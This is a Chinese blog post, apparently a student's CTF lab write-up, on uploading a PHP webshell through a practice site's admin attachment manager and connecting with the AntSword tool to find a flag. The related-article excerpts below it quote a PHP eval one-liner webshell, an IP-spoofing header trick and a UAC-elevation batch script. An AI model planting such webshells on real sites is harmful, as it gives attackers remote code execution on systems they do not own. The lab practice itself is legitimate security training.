获取管理员权限后,如何利用蚁剑得到flag

最新推荐文章于 2024-09-28 23:49:01 发布
最新推荐文章于 2024-09-28 23:49:01 发布
阅读量3.1k 收藏 1
点赞数
分类专栏: 兴趣小组 自学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47346400/article/details/108584683
版权

一:两种后台上传文件并查找该文件路径的方法

==①:==进入网站后台,按下图操作,随便写个文件在这里插入图片描述
==②进入新闻管理界面,点击修改 ,然后点击文件鼠标右键并复制文件地址
在浏览器中直接输入该地址 就能出现该文件了
在这里插入图片描述

在这里插入图片描述

二: 首先在rdctf部署一个地址

在这里插入图片描述
然后打开该界面并登录该网站的后门
在这里插入图片描述
mimawei:8618ahead (reverse)

写一个用作后门的php文件,并上传至靶机

在附件管理上传webshell.php文件并上传(网站后端 附件管理 上传)
在这里插入图片描述
然后打开该网站前台的常用文件中上传的文件
在这里插入图片描述

打开蚁剑并添加数据,再将上传的文件地址加入即可,然乎点击添加

在这里插入图片描述

在这里插入图片描述
连接成功后变双击该链接 如图
在这里插入图片描述
大致翻阅了其中的文件 发现在home文件夹中
在这里插入图片描述

在这里插入图片描述

完毕

\

一只会飞的猪-FlaggingPig1
关注
专栏目录
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
Bugku-管理员系统(伪造IP题)
ChenZIDu的博客
04-05 991
需要伪造本地IP: X-Forwarded-For: 127.0.0.1 伪造本地IP,获得flag 题目地址:http://123.206.31.85:1003/ 注意输入得账号密码必须正确! 按F12 查看网页源码 查过题解,绿色那一串是base64编码 解码之后获得:test64 管理员一般默认 账号是:admin、 输入账号密码; 弹出IP禁止访问;! 然后我们伪造本地IP; 先利用抓...
rdctf-shizhan1借助注入木马找到flag
qq_45970858的博客
09-14 1616
rdctf-shizhan1 进入实战页面 复制链接打开新的页面,在后面输入admins/进入后台管理员页面 找到可以上传文件的地方,例如附件管理,上传文件 此时先需要把php开启 点击网站,打开根目录 点击新建,创建新的php文档 (一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然
连接时出现问题及问题解决
最新发布
qq_52190342的博客
09-28 397
上一篇文章做文件上传时,连接时出现报错,仔细检查了地址以及密码,均无误。心想完蛋,得重安,后边百度了问题成功解决。按上图1、2、3设置,再重新测试连接,成功!注意:记得输入正确的地址以及密码哟~解决办法:(好烦,明天还得上班)
Vue引入TweenMax
Mybabyying的博客
11-23 1476
npm安装 npm install gsap --save-dev 引入文件 import {TweenMax} from ‘gsap’
上传webshell,利用获取flag
weixin_50644630的博客
09-14 3220
一、上传webshell 1创建一个文件,并命名为webshell 文件代码如下 <?php @eval($_POST['shell']);?> 2登陆后台,上传文件wenshell.php 进入附件管理,上传文件 在前台找到文件 点击常用文件,找到自己上传的文件 找到文件的目录 二、利用获取flag中添加URL,并填入密码 进入查看文件内容,找到flag ...
通过python脚本集体获取CTF中的flag并且提交
lwj173920的博客
10-25 729
从网址 https://cloud.dasctf.com/375/competePage/530 可知 match_id=375。# ip为比赛中靶机的ip地址,res=后面的即为对应靶机的flag,在比赛平台找对应的靶机flag对话框提交即可。# 118.24.11.89 为比赛平台获取flag的Server地址。ip_list = ["集体所有队伍的IP地址"]print("正在获取靶机的flag:")# token中的10121为比赛平台自己的id。# 数组中为比赛平台中所有队伍的ip地址。
005集——shp格式数据转换乱码问题——arcgis
yongshiqq的博客
02-07 3149
如果shapefile文件缺失 LDID 或者.CPG 文件,那么编码类型就会使用OEM编码类型,也就是操作系统默认编码类型(操作系统默认编码是个很神奇的编码,变数很多,比如:ANSI、mul-Language多国语言版,还有不同操作系统、同一操作系统不同编码类型的区别)。但是,shapefile的拥趸说“我的需求是恢复以前存储4个汉字的shapefile,我不想用地理数据库,我希望得到老版本的shapefile的结果,我不在乎shapefile的编码类型是什么 ……”好吧,方法还是有的。
利用一句话木马获取网站web权限
weixin_50644728的博客
09-14 3222
1.登录网站后台,寻找文件上传地方 进入网站管理后台并登录管理员帐户和密码,寻找文件上传点。此网站有多个可上传文件的地方,在这我们选择附件管理页面中的上传附件。 2.写文件
植入木马获取网站权限
Marsper的博客
09-14 1094
获取网站权限 首先获得需操作网址(下面演示的是学校练习靶机) 打开网址,利用上篇所讲知识得到后台管理员权限,登入后台管理 随机寻找可注入点,找到注入点根目录位置 如图,这个就是随机找到的可植入木马位置 先写好一个木马文件,即一句话木马 <?php @eval($_POST['shell']);?> 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();,或者用或菜刀等工具连接(我这里用的是): 然后上传至
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
热门推荐
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
BugkuCTF web——web2、web基础-$GET、web基础-$POST、web3、管理员系统、输入密码查看flag
veinard_F的博客
03-01 1244
1、web2: 本题只需要用F12查询源代码就可以 2、web基础-$GET: 点开链接后发现 可知是将flag赋给了变量what,又知道是GET方式,所以直接在url后面加" ?what=flag ", 出现flag 3、web基础-$POST 点开链接后发现 与上题类似,不过该题是POST方式,所以需要在报体进行信息改动,需要用插件HackBar Quantum 出现flag 4、w...
DarkHole_1的拿flag思路
m0_66583740的博客
11-16 94
这个靶机主要是考察了三个点,越权,文件上传,PATH提权。
web安全初阶2
m0_74146042的博客
05-28 413
Training-WWW-Robots nssctf(litctf,Litctf) 1.[LitCTF 2023]导弹迷踪 2.Follow me and hack me 3.作业管理系统 4.Flag点击就送 攻防世界 1.fileinclude 2.file_include 3.fileclude 4.inget 5.easyupload
的基本使用
yuqnqi的博客
05-08 1507
我的是 “D:\LeStoreDownload\phpStudyjiayou\phpstudy_pro\WWW\site”进入webshell.top的根目录,新建.txt文档,将后缀名改为.php并写入一句话木马。开启浏览器访问木马,我的页面是出现警告信息,不是报错,因为我设置的是显示警告信息。接下打开webshell.top的根目录,测试连接成功后 点击左上角的 “添加”响应码为200,说明脚本正常运行。接下来使用连接webshell。这里正常会返回403,不要慌。打开,单击右键, 添加数据。
BUUCTF学习笔记-BabyUpLoad
Emmawas的博客
09-28 746
考点:.htaccess绕过,文件内容为 AddType application/x-httpd-php .jpg,讲jpg文件按照php文件使用
shp设置utf8格式_shapefile与字符集编码设置
weixin_39807954的博客
12-21 2443
在 ArcGIS Desktop (ArcMap, ArcCatalog, and ArcToolbox) 中,有编码页转换功能(CODE PAGE CONVERSION),可以读写多种字符编码的 shapefile 和 dBASE 表。在系统注册表中,编码页转换功能(CODE PAGE CONVERSION)命名为 'dbfDefault',可以修改这个值。在 ArcGIS 10.2.1 之前,...
中国安装和使用教程(GOOD)
weixin_74245209的博客
11-30 2189
可以看到这是最高权限system相当于Linux中的root。官方加载器:(加载器分为Mac、Windows、Linux)在运行AntSword .exe。里面有一些好用的插件,大家自己去看。的大名想必各位都听过今天来安装配置。可以上传,修改或删除。可以右键建个快捷方式。添加webshell地址和密码。2.添加webshell。第一个箭头单点进入终端。
bat脚本获取管理员权限
04-28
要在bat脚本中获取管理员权限,可以使用以下代码: ``` @echo off :: BatchGotAdmin :------------------------------------- REM --> Check for permissions >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( echo Requesting administrative privileges... goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"="" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :gotAdmin pushd "%CD%" CD /D "%~dp0" :-------------------------------------- ``` 这段代码会检查当前用户是否拥有管理员权限。如果没有,它会提示用户请求管理员权限,并以管理员权限重新启动脚本。提示用户时,会弹出UAC(用户帐户控制)窗口,让用户确认是否同意以管理员权限来运行脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值